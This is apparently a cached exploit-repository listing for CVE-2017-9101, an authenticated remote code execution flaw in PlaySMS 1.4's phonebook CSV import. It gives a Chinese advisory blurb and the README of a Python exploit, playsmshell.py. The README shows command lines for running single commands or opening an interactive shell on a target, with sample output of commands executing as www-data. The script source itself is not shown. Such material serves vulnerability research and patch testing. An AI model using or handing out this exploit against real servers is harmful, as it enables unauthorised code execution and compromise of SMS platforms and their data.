CVE-2017-9101 PoC — PlaySMS 安全漏洞

Source

https://github.com/jasperla/CVE-2017-9101

Associated Vulnerability

Title:PlaySMS 安全漏洞 (CVE-2017-9101)
Description:PlaySMS是一套基于Web的短信平台。该平台支持连接短信网关、个人信息系统以及企业的群组通讯工具等。 PlaySMS 1.4版本中的import.php文件（又名电话簿导入功能）存在安全漏洞。远程攻击者可利用该漏洞执行代码。

Description

Exploit for PlaySMS 1.4 authenticated RCE

Readme

# PlaySMS 1.4 authenticated RCE

Simple method of performing remote code execution through the Phonebook CSV upload issue as described on [ExploitDB](https://www.exploit-db.com/exploits/42044/).

Either run a single command:

```
% python3 playsmshell.py --url http://localhost/playsms --password playwithsms -c 'id'
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
uid=33(www-data) gid=33(www-data) groups=33(www-data)

%
```

Or mimic a shell of sorts:

```
% python3 playsmshell.py --url http://localhost/playsms --password playwithsms -i
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[+] Entering interactive shell; type "quit" or ^D to quit
> uname -a
Linux localhost 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 i686 i686 GNU/Linux

> ls
config-dist.php
config.php
inc
index.php
init.php
lib
plugin
storage

> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

>
```

File Snapshot


 [4.0K]  /data/pocs/ff14de27a75cecfe2b511004b4c73486ed0aa8f5
├── [1.1K]  LICENSE
├── [4.4K]  playsmshell.py
└── [1.0K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!